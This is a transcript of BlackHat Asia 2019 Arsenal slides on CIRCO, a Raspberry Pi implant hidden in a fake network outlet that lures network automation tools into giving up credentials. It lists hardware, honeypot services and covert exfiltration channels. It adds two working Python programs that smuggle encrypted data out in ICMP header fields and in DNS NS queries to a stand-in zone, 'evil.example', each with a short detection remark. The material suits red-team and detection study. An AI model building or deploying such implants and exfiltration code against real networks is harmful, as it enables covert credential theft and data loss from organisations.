CIRCO - BlackHat Asia 2019 Arsenal

Emilio
March 29, 2019

Transcript

  1. What is CIRCO?

    Designed around a Raspberry Pi and aimed at Red Team Ops, CIRCO takes advantage of "Sec/Net/Dev/Ops" enterprise tools to capture network credentials in stealth mode. It uses low-profile hardware and electronics camouflaged as a plain network outlet box that sits under or on a desk. CIRCO includes several network data exfiltration techniques to avoid detection. The tool gathers information and uses a combination of honeypots to trick automation systems into handing over their network credentials! https://circo.cc
  2. Who do we target?

    • Cisco DNA (Digital Network Architecture)
    • Infoblox NetMRI
    • Micro Focus® Network Automation (formerly HPNA / Opsware)
    • ServiceNow Discovery*
    • ForeScout CounterACT (NAC)
    • Others

    * SNMP discovery only
  3. CIRCO Demo Box

    • Raspberry Pi Zero W with SD Card
    • USB LAN Adapter
    • USB Hub
    • Wireless Dongle (WLI-UC-GNM2S)
    • PoE LAN Adapter (12V)
    • Buck Regulator (12V to 5V)
  4. CIRCO Production Box (#1)

    • Raspberry Pi 3B with SD Card
    • PoE LAN Adapter (5V)
    • Quad RJ45 Wall Faceplate
    • Desk/Mount Box Network Outlet
  5. CIRCO Production Box (#2)

    • 1 RJ45 Socket
    • Desk/Mount Flat Network Outlet
    • Raspberry Pi Zero W with SD Card
    • PoE LAN Adapter (5V)
    • USB LAN Adapter
  6. Hardware Cost

    • LAN PoE Adapter (5V) = $6 (eBay)
    • USB LAN Adapter = $9 (Amazon)
    • USB Wireless Adapter = $10 (Amazon)
    • Raspberry Pi Zero = $6 (Pimoroni)
    • Flat Network Outlet = $9 (eBay)

    Get CIRCO for $40!
  7. Fake Services (Honeypots)

    • Cisco CDP & LLDP Advertisement (as IP Phone & Network Switch)
    • Cisco SNMP Agent
    • Cisco Telnet CLI (IOS 15.x)
    • Cisco SSH CLI (IOS 15.x)
  8. Network Exfiltration Techniques

    Credentials & IP address are encrypted with AES before sending.

    • ICMP (IP.id & ICMP.seq fields)
    • Traceroute (IP.id field & UDP payload)
    • DNS (NS query for evil.sub.domain)
    • HTTP (IP.id & TCP.window fields)
    • HTTPS (IP.id & TCP.window fields)
    • DNS (A query) via proxy, with the proxy located through DHCP Option 252, WPAD.<domain> or PAC guessing via DNS
    • Wireless* (SSID name & Dot11.beacon, Dot11.SC and Dot11.interval)

    * Proximity required
  9. IP Packet Fields (32 bits per row)

    Version (4) | IHL (4) | DSCP (6) | ECN (2) | Total Length (16)
    Identification (16) | Flags (3) | Fragment Offset (13)
    Time to Live (8) | Protocol (8) | Header Checksum (16)
    Source Address (32)
    Destination Address (32)
    Options (present when IHL > 5)
  10. ICMP Packet Fields (echo request/reply, 32 bits per row)

    Type (8) | Code (8) | Checksum (16)
    Identifier (16) | Sequence Number (16)
    Optional Data
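    The ICMP technique from the exfiltration slide (2 bytes in IP.id and 2 bytes in ICMP.seq per echo request), worked through as an added Python example that is not CIRCO's own code. Both sides are shown: the sender builds raw IPv4 + ICMP echo requests with the covert values in the two header fields shown on the IP and ICMP slides, and the receiver validates the checksums and pulls the same two fields back out. The ciphertext is a constructed placeholder standing in for the AES output the deck mentions, the addresses and ICMP identifier are made up, and the 2-byte length prefix plus zero padding are this example's own framing, not CIRCO's.

```python
"""Covert exfiltration over ICMP echo requests: 2 bytes in IP.id and
2 bytes in ICMP.seq per packet, plus the receiver that extracts them.
Added example; framing, addresses and sample ciphertext are assumptions."""
import socket
import struct

ICMP_ECHO_REQUEST = 8
# Constructed filler that mimics the default Linux ping payload
# (8-byte timestamp slot, then 0x10..0x3f) so the data portion looks ordinary.
PING_FILLER = bytes(8) + bytes(range(0x10, 0x40))
# Constructed placeholder for the AES ciphertext CIRCO would send.
SAMPLE_CIPHERTEXT = bytes.fromhex("9f1c7a03e4b255d8c0ff11ab")


def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum over 16-bit big-endian words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_covert_ping(src: str, dst: str, ip_id: int, icmp_seq: int,
                      icmp_ident: int = 0x1234) -> bytes:
    """Raw IPv4 header + ICMP echo request with the two covert 16-bit values set."""
    icmp = struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, 0, icmp_ident, icmp_seq) + PING_FILLER
    icmp = icmp[:2] + struct.pack("!H", inet_checksum(icmp)) + icmp[4:]
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), ip_id, 0, 64,
                         socket.IPPROTO_ICMP, 0, socket.inet_aton(src), socket.inet_aton(dst))
    ip_hdr = ip_hdr[:10] + struct.pack("!H", inet_checksum(ip_hdr)) + ip_hdr[12:]
    return ip_hdr + icmp


def icmp_encode(ciphertext: bytes, src: str, dst: str) -> list:
    """Sender: frame = 2-byte length + ciphertext, carried 4 bytes per packet
    (IP.id takes the first pair, ICMP.seq the second), zero padded."""
    frame = struct.pack("!H", len(ciphertext)) + ciphertext
    frame += bytes(-len(frame) % 4)
    packets = []
    for off in range(0, len(frame), 4):
        ip_id, seq = struct.unpack("!HH", frame[off:off + 4])
        packets.append(build_covert_ping(src, dst, ip_id, seq))
    return packets


def parse_covert_ping(raw: bytes):
    """Receiver (or sensor): (ip_id, icmp_seq) for a well-formed IPv4 echo
    request with valid checksums, else None."""
    if len(raw) < 28 or raw[0] >> 4 != 4:
        return None
    ihl = (raw[0] & 0x0F) * 4
    if ihl < 20 or raw[9] != socket.IPPROTO_ICMP or inet_checksum(raw[:ihl]) != 0:
        return None
    icmp = raw[ihl:]
    if len(icmp) < 8 or icmp[0] != ICMP_ECHO_REQUEST or inet_checksum(icmp) != 0:
        return None
    ip_id = struct.unpack("!H", raw[4:6])[0]        # IP Identification field
    seq = struct.unpack("!H", icmp[6:8])[0]         # ICMP Sequence Number field
    return ip_id, seq


def icmp_decode(packets) -> bytes:
    """Receiver: rebuild the frame from the packets (in transmission order)."""
    frame = b""
    for raw in packets:
        fields = parse_covert_ping(raw)
        if fields is None:
            raise ValueError("packet is not a valid covert echo request")
        frame += struct.pack("!HH", *fields)
    length = struct.unpack("!H", frame[:2])[0]
    if length > len(frame) - 2:
        raise ValueError("truncated stream")
    return frame[2:2 + length]


if __name__ == "__main__":
    pkts = icmp_encode(SAMPLE_CIPHERTEXT, "10.0.0.5", "203.0.113.9")
    print(len(pkts), "echo requests;", "round trip ok:", icmp_decode(pkts) == SAMPLE_CIPHERTEXT)
```

    The packets are complete IP datagrams, so on Linux they would be written to a raw socket (`socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW`) with root; nothing here touches the network. From the defender's side, `parse_covert_ping` is also the shape of a detector: a host whose pings carry a non-monotonic ICMP.seq, or an IP.id series that does not look like the kernel's counter, is worth a closer look.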
  11. UDP Packet Fields (32 bits per row)

    Source Port (16) | Destination Port (16)
    Length (16) | Checksum (16)
    Optional Data
  12. TCP Packet Fields (32 bits per row)

    Source Port (16) | Destination Port (16)
    Sequence Number (32)
    Acknowledgement Number (32)
    Data Offset (4) | Reserved | Control Flags | Window Size (16)
    Checksum (16) | Urgent Pointer (16)
    Options / Optional Data
  13. DNS Packet Fields (header, 16 bits per row)

    Query ID
    QR (1) | Opcode (4) | AA | TC | RD | RA | Z (3) | Rcode (4)
    Question Count
    Answer Count
    Authority RR Count
    Additional RR Count
    DNS Question or Answer Data (follows the 12-byte header)
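    The DNS NS-query channel from the exfiltration slide, as an added Python example that is not CIRCO's own code. The sender base32-encodes each 30-byte chunk of ciphertext into one label under an attacker-controlled zone and wraps it in a minimal NS question; the authoritative-side parser reads the header fields from the DNS slide, rejects anything that is not a standard query for that zone, and reassembles the chunks. The zone name evil.example, the 4-hex-digit sequence label and the chunk size are this example's assumptions.

```python
"""DNS covert channel: ciphertext carried in the QNAME of an NS query to an
attacker-controlled zone, plus the authoritative-side parser.
Added example; zone, chunking and sequence label are assumptions."""
import base64
import struct

QTYPE_NS = 2
QCLASS_IN = 1
CHUNK = 30                 # 30 raw bytes -> 48 base32 chars, under the 63-char label limit
ZONE = "evil.example"      # assumed attacker-controlled zone (placeholder)


def encode_qname(name: str) -> bytes:
    """Wire-format name: length-prefixed labels, terminated by a zero byte."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        if not 0 < len(raw) <= 63:
            raise ValueError("bad label length")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def decode_qname(msg: bytes, off: int):
    """Parse a wire-format name starting at off; returns (name, next offset)."""
    labels = []
    while True:
        n = msg[off]
        off += 1
        if n == 0:
            return ".".join(labels), off
        if n & 0xC0:
            raise ValueError("compression pointer not expected in a question")
        labels.append(msg[off:off + n].decode("ascii"))
        off += n


def build_ns_query(txid: int, qname: str) -> bytes:
    """Header: ID, flags (QR=0, opcode 0, RD=1), QDCOUNT=1, AN/NS/AR=0; then one question."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_qname(qname) + struct.pack("!HH", QTYPE_NS, QCLASS_IN)


def dns_encode(ciphertext: bytes, zone: str = ZONE) -> list:
    """Sender: one NS query per chunk, name = <seq>.<base32 chunk>.<zone>."""
    queries = []
    for off in range(0, len(ciphertext), CHUNK):
        seq = off // CHUNK
        b32 = base64.b32encode(ciphertext[off:off + CHUNK]).decode("ascii").rstrip("=").lower()
        queries.append(build_ns_query(0x1000 + seq, "%04x.%s.%s" % (seq, b32, zone)))
    return queries


def parse_ns_query(msg: bytes, zone: str = ZONE):
    """Authoritative side: (seq, chunk) for a standard NS query under zone, else None."""
    if len(msg) < 12:
        return None
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    if flags & 0x8000 or (flags >> 11) & 0xF or qd != 1:
        return None                      # a reply, a non-standard opcode, or not one question
    try:
        qname, off = decode_qname(msg, 12)
        qtype, qclass = struct.unpack("!HH", msg[off:off + 4])
        if qtype != QTYPE_NS or qclass != QCLASS_IN or not qname.endswith("." + zone):
            return None
        labels = qname[:-len(zone) - 1].split(".")
        if len(labels) != 2:
            return None
        b32 = labels[1].upper()
        b32 += "=" * (-len(b32) % 8)     # restore the padding stripped for the label
        return int(labels[0], 16), base64.b32decode(b32)
    except (ValueError, IndexError, UnicodeDecodeError):
        return None


def dns_decode(queries, zone: str = ZONE) -> bytes:
    """Reassemble chunks by sequence number, so out-of-order arrival is tolerated."""
    chunks = {}
    for q in queries:
        parsed = parse_ns_query(q, zone)
        if parsed is None:
            raise ValueError("unexpected query")
        seq, data = parsed
        chunks[seq] = data
    return b"".join(chunks[i] for i in sorted(chunks))


if __name__ == "__main__":
    sample = bytes.fromhex("9f1c7a03e4b255d8c0ff11ab")   # constructed placeholder ciphertext
    qs = dns_encode(sample)
    print(len(qs), "NS queries; round trip ok:", dns_decode(qs) == sample)
```

    Each query is a bare DNS message; on the wire it goes in a UDP datagram to port 53 of the enterprise resolver, which forwards the NS question to the zone's authoritative server, so the implant never needs a direct path out. The same parser, pointed at resolver logs, is the detection side: long single-label base32 or hex names under one external zone, asked for as NS records, are not what ordinary clients produce.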